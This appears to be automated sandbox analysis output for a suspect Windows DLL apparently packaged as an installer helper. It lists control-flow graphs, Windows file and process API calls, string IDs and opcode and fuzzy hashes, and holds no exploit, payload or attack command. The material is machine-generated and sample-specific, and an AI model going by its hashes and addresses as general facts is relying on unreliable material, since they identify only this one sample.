                                                                                                                • Opcode ID: c00447a5c2888fb8dac0c2e2600b07906897e77cd5e026fe8a0c237e33cca6c6
                                                                                                                • Instruction ID: 4a93814016b46ed3c5ffd1ee811a05df7e4f08cda140eb09ad9692c395194d61
                                                                                                                • Opcode Fuzzy Hash: c00447a5c2888fb8dac0c2e2600b07906897e77cd5e026fe8a0c237e33cca6c6
                                                                                                                • Instruction Fuzzy Hash: 54C12674A062499FDF05CF99CC80BEDBBB4BF1A718F184858E424ABB81CB34D905CB61

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 4023 6c992e8c-6c992ebc call 6c99330c 4026 6c992ebe-6c992ec9 call 6c97e7ff 4023->4026 4027 6c992ed7-6c992ee3 call 6c99042c 4023->4027 4032 6c992ecb-6c992ed2 call 6c97e7ec 4026->4032 4033 6c992efc-6c992f45 call 6c993277 4027->4033 4034 6c992ee5-6c992efa call 6c97e7ff call 6c97e7ec 4027->4034 4044 6c9931b1-6c9931b5 4032->4044 4042 6c992fb2-6c992fbb GetFileType 4033->4042 4043 6c992f47-6c992f50 4033->4043 4034->4032 4048 6c992fbd-6c992fee GetLastError call 6c97e812 CloseHandle 4042->4048 4049 6c993004-6c993007 4042->4049 4046 6c992f52-6c992f56 4043->4046 4047 6c992f87-6c992fad GetLastError call 6c97e812 4043->4047 4046->4047 4052 6c992f58-6c992f85 call 6c993277 4046->4052 4047->4032 4048->4032 4060 6c992ff4-6c992fff call 6c97e7ec 4048->4060 4050 6c993009-6c99300e 4049->4050 4051 6c993010-6c993016 4049->4051 4056 6c99301a-6c993068 call 6c9905d0 4050->4056 4051->4056 4057 6c993018 4051->4057 4052->4042 4052->4047 4066 6c99306a-6c993076 call 6c993486 4056->4066 4067 6c993087-6c9930af call 6c993530 4056->4067 4057->4056 4060->4032 4066->4067 4074 6c993078 4066->4074 4072 6c9930b1-6c9930b2 4067->4072 4073 6c9930b4-6c9930f5 4067->4073 4075 6c99307a-6c993082 call 6c98a745 4072->4075 4076 6c9930f7-6c9930fb 4073->4076 4077 6c993116-6c993124 4073->4077 4074->4075 4075->4044 4076->4077 4079 6c9930fd-6c993111 4076->4079 4080 6c99312a-6c99312e 4077->4080 4081 6c9931af 4077->4081 4079->4077 4080->4081 4083 6c993130-6c993163 CloseHandle call 6c993277 4080->4083 4081->4044 4086 6c993165-6c993191 GetLastError call 6c97e812 call 6c99053f 4083->4086 4087 6c993197-6c9931ab 4083->4087 4086->4087 4087->4081
                                                                                                                APIs
                                                                                                                  • Part of subcall function 6C993277: CreateFileW.KERNEL32(00000000,00000000,?,6C992F35,?,?,00000000,?,6C992F35,00000000,0000000C), ref: 6C993294
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C992FA0
                                                                                                                • __dosmaperr.LIBCMT ref: 6C992FA7
                                                                                                                • GetFileType.KERNEL32(00000000), ref: 6C992FB3
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C992FBD
                                                                                                                • __dosmaperr.LIBCMT ref: 6C992FC6
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6C992FE6
                                                                                                                • CloseHandle.KERNEL32(6C989EF0), ref: 6C993133
                                                                                                                • GetLastError.KERNEL32 ref: 6C993165
                                                                                                                • __dosmaperr.LIBCMT ref: 6C99316C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                • String ID: 8Q
                                                                                                                • API String ID: 4237864984-4022487301
                                                                                                                • Opcode ID: 25673e3ccc3b36967f10181c6fbf29bd5dff5fb24e75098ada06c9ee24dbce19
                                                                                                                • Instruction ID: 4f7b6c5a4e008131aa0973e3aa7bb04dc38f8453df9bf9f759886cf3d1732a3d
                                                                                                                • Opcode Fuzzy Hash: 25673e3ccc3b36967f10181c6fbf29bd5dff5fb24e75098ada06c9ee24dbce19
                                                                                                                • Instruction Fuzzy Hash: F4A13232A046559FCF198FB8C8807EE7BB4BB06328F18425DE815AF790CB35C916C762

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 4092 6c94b750-6c94b7c0 call 6c975990 call 6c97a740 4097 6c94b7e6-6c94b7ef 4092->4097 4098 6c94b850-6c94b855 4097->4098 4099 6c94b7f1-6c94b7f6 4097->4099 4100 6c94b950-6c94b955 4098->4100 4101 6c94b85b-6c94b860 4098->4101 4102 6c94b8b0-6c94b8b5 4099->4102 4103 6c94b7fc-6c94b801 4099->4103 4106 6c94ba75-6c94ba7a 4100->4106 4107 6c94b95b-6c94b960 4100->4107 4108 6c94b866-6c94b86b 4101->4108 4109 6c94b9dd-6c94b9e2 4101->4109 4110 6c94ba0e-6c94ba13 4102->4110 4111 6c94b8bb-6c94b8c0 4102->4111 4104 6c94b807-6c94b80c 4103->4104 4105 6c94b9ac-6c94b9b1 4103->4105 4112 6c94bab6-6c94babb 4104->4112 4113 6c94b812-6c94b817 4104->4113 4122 6c94b9b7-6c94b9bc 4105->4122 4123 6c94bbf1-6c94bbf6 4105->4123 4124 6c94ba80-6c94ba85 4106->4124 4125 6c94bcdb-6c94bce0 4106->4125 4118 6c94b966-6c94b96b 4107->4118 4119 6c94bb9a-6c94bb9f 4107->4119 4120 6c94b871-6c94b876 4108->4120 4121 6c94bafa-6c94baff 4108->4121 4114 6c94bc2c-6c94bc31 4109->4114 4115 6c94b9e8-6c94b9ed 4109->4115 4116 6c94bc79-6c94bc7e 4110->4116 4117 6c94ba19-6c94ba1e 4110->4117 4126 6c94b8c6-6c94b8cb 4111->4126 4127 6c94bb48-6c94bb4d 4111->4127 4144 6c94c026-6c94c04e 4112->4144 4145 6c94bac1-6c94bac6 4112->4145 4130 6c94bd16-6c94bd1b 4113->4130 4131 6c94b81d-6c94b822 4113->4131 4138 6c94bc37-6c94bc3c 4114->4138 4139 6c94c162-6c94c193 4114->4139 4128 6c94bf46-6c94bf81 call 6c97a740 call 6c94a500 4115->4128 4129 6c94b9f3-6c94b9f8 4115->4129 4142 6c94bc84-6c94bc89 4116->4142 4143 6c94c1c7-6c94c1f6 4116->4143 4134 6c94ba24-6c94ba29 4117->4134 4135 6c94bfab-6c94bfcb 4117->4135 4152 6c94b971-6c94b976 4118->4152 4153 6c94be2a-6c94be2f 4118->4153 4156 6c94bba5-6c94bbaa 4119->4156 4157 6c94c0e0-6c94c10c 4119->4157 4136 6c94bd43-6c94bd48 4120->4136 4137 6c94b87c-6c94b881 4120->4137 4150 6c94bb05-6c94bb0a 4121->4150 4151 6c94c082-6c94c099 4121->4151 4158 6c94b9c2-6c94b9c7 4122->4158 4159 6c94bebc-6c94bf24 4122->4159 4132 6c94bbfc-6c94bc01 4123->4132 4133 6c94c13d-6c94c15d 4123->4133 4140 6c94bff5-6c94c005 4124->4140 4141 6c94ba8b-6c94ba90 4124->4141 4148 6c94bce6-6c94bceb 4125->4148 4149 6c94c22e-6c94c23e 4125->4149 4146 6c94bda6-6c94bdab 4126->4146 4147 6c94b8d1-6c94b8d6 4126->4147 4154 6c94bb53-6c94bb58 4127->4154 4155 6c94bc9a-6c94bcd6 4127->4155 4229 6c94bf86-6c94bfa6 4128->4229 4184 6c94bdfd-6c94be25 4129->4184 4185 6c94b9fe-6c94ba03 4129->4185 4173 6c94bd21-6c94bd26 4130->4173 4174 6c94c262-6c94c286 4130->4174 4160 6c94bdd0-6c94bdf8 4131->4160 4161 6c94b828-6c94b82d 4131->4161 4132->4155 4162 6c94bc07-6c94bc0c 4132->4162 4133->4097 4186 6c94bfd0-6c94bff0 4134->4186 4187 6c94ba2f-6c94ba34 4134->4187 4135->4097 4175 6c94bd4e-6c94bd53 4136->4175 4176 6c94c28b-6c94c29b 4136->4176 4165 6c94b887-6c94b88c 4137->4165 4166 6c94b7c2-6c94b7d3 4137->4166 4163 6c94bc42-6c94bc47 4138->4163 4164 6c94c198-6c94c1c2 call 6c97a1c0 4138->4164 4139->4097 4190 6c94c00f-6c94c01c 4140->4190 4189 6c94ba96-6c94ba9b 4141->4189 4141->4190 4167 6c94bc8f-6c94bc94 4142->4167 4168 6c94c1fb-6c94c229 4142->4168 4143->4097 4195 6c94c054-6c94c05c 4144->4195 4191 6c94c061-6c94c07a 4145->4191 4192 6c94bacc-6c94bad1 4145->4192 4146->4160 4179 6c94bdad-6c94bdb2 4146->4179 4171 6c94be83-6c94be93 4147->4171 4172 6c94b8dc-6c94b8e1 4147->4172 4169 6c94bcf1-6c94bcf6 4148->4169 4170 6c94c248-6c94c258 4148->4170 4149->4170 4193 6c94bb10-6c94bb15 4150->4193 4194 6c94c0a3-6c94c0c3 4150->4194 4151->4194 4177 6c94b97c-6c94b981 4152->4177 4178 6c94be9d-6c94beb7 4152->4178 4182 6c94c2a5-6c94c2aa 4153->4182 4183 6c94be35-6c94be7e 4153->4183 4196 6c94bb5e-6c94bb63 4154->4196 4197 6c94c0c8-6c94c0d8 4154->4197 4155->4097 4198 6c94bbb0-6c94bbb5 4156->4198 4199 6c94c111-6c94c138 4156->4199 4157->4097 4180 6c94b9cd-6c94b9d2 4158->4180 4181 6c94bf29-6c94bf3e 4158->4181 4159->4097 4160->4097 4161->4097 4201 6c94b82f-6c94b841 4161->4201 4162->4097 4202 6c94bc12-6c94bc27 4162->4202 4163->4097 4204 6c94bc4d-6c94bc74 4163->4204 4164->4097 4165->4097 4203 6c94b892-6c94b89f 4165->4203 4220 6c94b7d8-6c94b7dd 4166->4220 4167->4097 4167->4155 4168->4097 4169->4097 4207 6c94bcfc-6c94bd11 4169->4207 4170->4174 4171->4178 4172->4097 4206 6c94b8e7-6c94b94a call 6c94c2c0 CreateFileA 4172->4206 4173->4097 4208 6c94bd2c-6c94bd39 4173->4208 4174->4097 4175->4097 4209 6c94bd59-6c94bda1 4175->4209 4176->4182 4177->4097 4210 6c94b987-6c94b9a7 4177->4210 4214 6c94b7e0-6c94b7e4 4178->4214 4179->4097 4211 6c94bdb8-6c94bdc8 4179->4211 4180->4184 4212 6c94b9d8 4180->4212 4181->4128 4182->4097 4205 6c94c2b0-6c94c2bb 4182->4205 4183->4214 4184->4097 4185->4160 4213 6c94ba09 4185->4213 4186->4097 4187->4097 4215 6c94ba3a-6c94ba70 4187->4215 4189->4097 4217 6c94baa1-6c94bab1 4189->4217 4190->4144 4191->4151 4192->4097 4218 6c94bad7-6c94baf1 4192->4218 4193->4097 4219 6c94bb1b-6c94bb43 4193->4219 4194->4097 4195->4097 4196->4097 4221 6c94bb69-6c94bb95 4196->4221 4197->4157 4198->4097 4222 6c94bbbb-6c94bbec call 6c9418a0 call 6c9418b0 4198->4222 4199->4097 4201->4214 4202->4097 4203->4220 4204->4097 4206->4097 4207->4097 4208->4136 4209->4097 4210->4195 4211->4160 4212->4097 4213->4097 4214->4097 4215->4097 4217->4214 4218->4121 4219->4097 4220->4214 4221->4097 4222->4097 4229->4097
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 1:x$1:x$wtU'$xtU'$xtU'
                                                                                                                • API String ID: 0-2932700092
                                                                                                                • Opcode ID: 9582e9c101f06cf333068a339fa3ee4a3e3f4cb510a3f4a69c95d3d07ffd387f
                                                                                                                • Instruction ID: d7e57fac3f83a8cbee03b9f1b1ee300b4cc76ef3d94a13dbe4a862b358425814
                                                                                                                • Opcode Fuzzy Hash: 9582e9c101f06cf333068a339fa3ee4a3e3f4cb510a3f4a69c95d3d07ffd387f
                                                                                                                • Instruction Fuzzy Hash: 0352217460D7829FCB14CE28C49062EBBF1AF8A714F248D5EE499CBB50D634D889CB53
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ;T55
                                                                                                                • API String ID: 0-2572755013
                                                                                                                • Opcode ID: f2b943859b3d7ca4c3799f898ba98b74db0a49a462e5902b58aa53dbd2420bb4
                                                                                                                • Instruction ID: b2709f413f4004ae6a5f8fbc4ff0ebd4a2339b218a33b939a016d6886457440b
                                                                                                                • Opcode Fuzzy Hash: f2b943859b3d7ca4c3799f898ba98b74db0a49a462e5902b58aa53dbd2420bb4
                                                                                                                • Instruction Fuzzy Hash: D103C031645B018FC738CF28C9D0696B7E2AFD5324B19CE6DC0AA4BB95DB74B44ACB50

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 4627 6c973e00-6c973e87 CreateProcessA 4628 6c973eab-6c973eb4 4627->4628 4629 6c973eb6-6c973ebb 4628->4629 4630 6c973ed0-6c973f1a WaitForSingleObject CloseHandle * 2 4628->4630 4631 6c973e90-6c973ea3 4629->4631 4632 6c973ebd-6c973ec2 4629->4632 4630->4628 4631->4628 4632->4628 4633 6c973ec4-6c973f27 4632->4633
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$CreateObjectProcessSingleWait
                                                                                                                • String ID: D
                                                                                                                • API String ID: 2059082233-2746444292
                                                                                                                • Opcode ID: 43b9603db363da6e7c40c7a492400d45ac752fd94b9bc5e928da7c7aa1794006
                                                                                                                • Instruction ID: 8dfbdbc85a40f0ee7f278b43be12df7f9ca6bf2ca37a5ee33965d8494f74f1a0
                                                                                                                • Opcode Fuzzy Hash: 43b9603db363da6e7c40c7a492400d45ac752fd94b9bc5e928da7c7aa1794006
                                                                                                                • Instruction Fuzzy Hash: 8631EFB18193418FD710DF28C18876ABBF0BB89308F509A1DF8D986260E774D584CF43

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 4648 6c98aa7e-6c98aa9a 4649 6c98ac59 4648->4649 4650 6c98aaa0-6c98aaa2 4648->4650 4651 6c98ac5b-6c98ac5f 4649->4651 4652 6c98aac4-6c98aae5 4650->4652 4653 6c98aaa4-6c98aab7 call 6c97e7ff call 6c97e7ec call 6c97ef40 4650->4653 4654 6c98aaec-6c98aaf2 4652->4654 4655 6c98aae7-6c98aaea 4652->4655 4668 6c98aabc-6c98aabf 4653->4668 4654->4653 4657 6c98aaf4-6c98aaf9 4654->4657 4655->4654 4655->4657 4659 6c98ab0a-6c98ab1b call 6c98ac60 4657->4659 4660 6c98aafb-6c98ab07 call 6c989a89 4657->4660 4669 6c98ab5c-6c98ab6e 4659->4669 4670 6c98ab1d-6c98ab1f 4659->4670 4660->4659 4668->4651 4671 6c98ab70-6c98ab79 4669->4671 4672 6c98abb5-6c98abd7 WriteFile 4669->4672 4673 6c98ab21-6c98ab29 4670->4673 4674 6c98ab46-6c98ab52 call 6c98acd1 4670->4674 4678 6c98ab7b-6c98ab7e 4671->4678 4679 6c98aba5-6c98abb3 call 6c98b0e3 4671->4679 4675 6c98abd9-6c98abdf GetLastError 4672->4675 4676 6c98abe2 4672->4676 4680 6c98abeb-6c98abee 4673->4680 4681 6c98ab2f-6c98ab3c call 6c98b07b 4673->4681 4683 6c98ab57-6c98ab5a 4674->4683 4675->4676 4684 6c98abe5-6c98abea 4676->4684 4686 6c98ab80-6c98ab83 4678->4686 4687 6c98ab95-6c98aba3 call 6c98b2a7 4678->4687 4679->4683 4685 6c98abf1-6c98abf6 4680->4685 4691 6c98ab3f-6c98ab41 4681->4691 4683->4691 4684->4680 4692 6c98abf8-6c98abfd 4685->4692 4693 6c98ac54-6c98ac57 4685->4693 4686->4685 4694 6c98ab85-6c98ab93 call 6c98b1be 4686->4694 4687->4683 4691->4684 4696 6c98ac29-6c98ac35 4692->4696 4697 6c98abff-6c98ac04 4692->4697 4693->4651 4694->4683 4700 6c98ac3c-6c98ac4f call 6c97e7ec call 6c97e7ff 4696->4700 4701 6c98ac37-6c98ac3a 4696->4701 4702 6c98ac1d-6c98ac24 call 6c97e812 4697->4702 4703 6c98ac06-6c98ac18 call 6c97e7ec call 6c97e7ff 4697->4703 4700->4668 4701->4649 4701->4700 4702->4668 4703->4668
                                                                                                                APIs
                                                                                                                  • Part of subcall function 6C98ACD1: GetConsoleCP.KERNEL32(?,6C989EF0,?), ref: 6C98AD19
                                                                                                                • WriteFile.KERNEL32(?,?,6C99350C,00000000,00000000,?,00000000,00000000,6C9948D6,00000000,00000000,?,00000000,6C989EF0,6C99350C,00000000), ref: 6C98ABCF
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C99350C,6C989EF0,00000000,?,?,?,?,00000000,?), ref: 6C98ABD9
                                                                                                                • __dosmaperr.LIBCMT ref: 6C98AC1E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                                                                                                • String ID: 8Q
                                                                                                                • API String ID: 251514795-4022487301
                                                                                                                • Opcode ID: d18bfe8a9d26315c303d93e8bb7d5411c7711ea75873f07f99bba6c9acc95976
                                                                                                                • Instruction ID: c8f6e5034fc06c78113e5631c7a76cb779e1f97e033d0eda70358042dec5db4e
                                                                                                                • Opcode Fuzzy Hash: d18bfe8a9d26315c303d93e8bb7d5411c7711ea75873f07f99bba6c9acc95976
                                                                                                                • Instruction Fuzzy Hash: AC51C571A06109AFDB01CFA8CC80BDEBBBAEF16718F140955E510ABA90DB74D94587A1

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 4715 6c9749b0-6c9749bc 4716 6c9749be-6c9749c9 4715->4716 4717 6c9749fd 4715->4717 4719 6c9749df-6c9749ec call 6c8401f0 call 6c97f938 4716->4719 4720 6c9749cb-6c9749dd 4716->4720 4718 6c9749ff-6c974a77 4717->4718 4721 6c974aa3-6c974aa9 4718->4721 4722 6c974a79-6c974aa1 4718->4722 4728 6c9749f1-6c9749fb 4719->4728 4720->4719 4722->4721 4725 6c974aaa-6c974b69 call 6c842250 call 6c842340 call 6c978199 call 6c83e010 call 6c975ea8 4722->4725 4728->4718
                                                                                                                APIs
                                                                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C974B51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                • API String ID: 323602529-1866435925
                                                                                                                • Opcode ID: 0c8aaade41a305511551c8c8e338311829f695b2652c4188466a58a754b1a661
                                                                                                                • Instruction ID: 46c0c14b79bc731e27ecccca16243e8779f45d1ea55b47003e1387bb06d4cede
                                                                                                                • Opcode Fuzzy Hash: 0c8aaade41a305511551c8c8e338311829f695b2652c4188466a58a754b1a661
                                                                                                                • Instruction Fuzzy Hash: A15134B5900B008FD729CF29C585797BBF1BB58318F048A2DD4864BB91D775E90ACFA0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 4738 6c94c310-6c94c36c call 6c975990 4741 6c94c3c0-6c94c3c9 4738->4741 4742 6c94c410-6c94c415 4741->4742 4743 6c94c3cb-6c94c3d0 4741->4743 4744 6c94c4f8-6c94c4fd 4742->4744 4745 6c94c41b-6c94c420 4742->4745 4746 6c94c3d6-6c94c3db 4743->4746 4747 6c94c460-6c94c465 4743->4747 4752 6c94c5e6-6c94c5fd WriteFile 4744->4752 4753 6c94c503-6c94c508 4744->4753 4748 6c94c426-6c94c42b 4745->4748 4749 6c94c567-6c94c597 call 6c97a1c0 4745->4749 4754 6c94c3e1-6c94c3e6 4746->4754 4755 6c94c51d-6c94c531 WriteFile 4746->4755 4750 6c94c59c-6c94c5b4 4747->4750 4751 6c94c46b-6c94c470 4747->4751 4756 6c94c431-6c94c436 4748->4756 4757 6c94c36e-6c94c3b0 call 6c97a740 ReadFile 4748->4757 4749->4741 4760 6c94c5bc-6c94c5d0 4750->4760 4759 6c94c476-6c94c47b 4751->4759 4751->4760 4761 6c94c607-6c94c60c 4752->4761 4753->4761 4762 6c94c50e-6c94c513 4753->4762 4763 6c94c3ec-6c94c3f1 4754->4763 4764 6c94c53b-6c94c55f 4754->4764 4755->4764 4756->4741 4765 6c94c438-6c94c452 4756->4765 4773 6c94c3b3-6c94c3b8 4757->4773 4759->4741 4768 6c94c481-6c94c4ee WriteFile 4759->4768 4769 6c94c5d4-6c94c5e1 4760->4769 4761->4741 4770 6c94c612-6c94c620 4761->4770 4762->4755 4763->4741 4771 6c94c3f3-6c94c406 4763->4771 4764->4749 4765->4769 4768->4744 4769->4741 4771->4773 4773->4741
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: feab42ca6a17e95d1dddc2a84aea153a79b6a5b92137ee497332d801a4247bf9
                                                                                                                • Instruction ID: 9074ec1f338182aab6d6df4f53308ac0b84223125bd010d458a0ab1d2117b502
                                                                                                                • Opcode Fuzzy Hash: feab42ca6a17e95d1dddc2a84aea153a79b6a5b92137ee497332d801a4247bf9
                                                                                                                • Instruction Fuzzy Hash: A7717BB0208305AFD710DF18C480B9FBBF9BF89719F50892EF599C6660D775E8588B92

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 4796 6c98a745-6c98a759 call 6c9903c2 4799 6c98a75b-6c98a75d 4796->4799 4800 6c98a75f-6c98a767 4796->4800 4801 6c98a7ad-6c98a7cd call 6c99053f 4799->4801 4802 6c98a769-6c98a770 4800->4802 4803 6c98a772-6c98a775 4800->4803 4811 6c98a7db 4801->4811 4812 6c98a7cf-6c98a7d9 call 6c97e812 4801->4812 4802->4803 4805 6c98a77d-6c98a791 call 6c9903c2 * 2 4802->4805 4806 6c98a793-6c98a7a3 call 6c9903c2 CloseHandle 4803->4806 4807 6c98a777-6c98a77b 4803->4807 4805->4799 4805->4806 4806->4799 4818 6c98a7a5-6c98a7ab GetLastError 4806->4818 4807->4805 4807->4806 4816 6c98a7dd-6c98a7e0 4811->4816 4812->4816 4818->4801
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,6C99307F), ref: 6C98A79B
                                                                                                                • GetLastError.KERNEL32(?,00000000,?,6C99307F), ref: 6C98A7A5
                                                                                                                • __dosmaperr.LIBCMT ref: 6C98A7D0
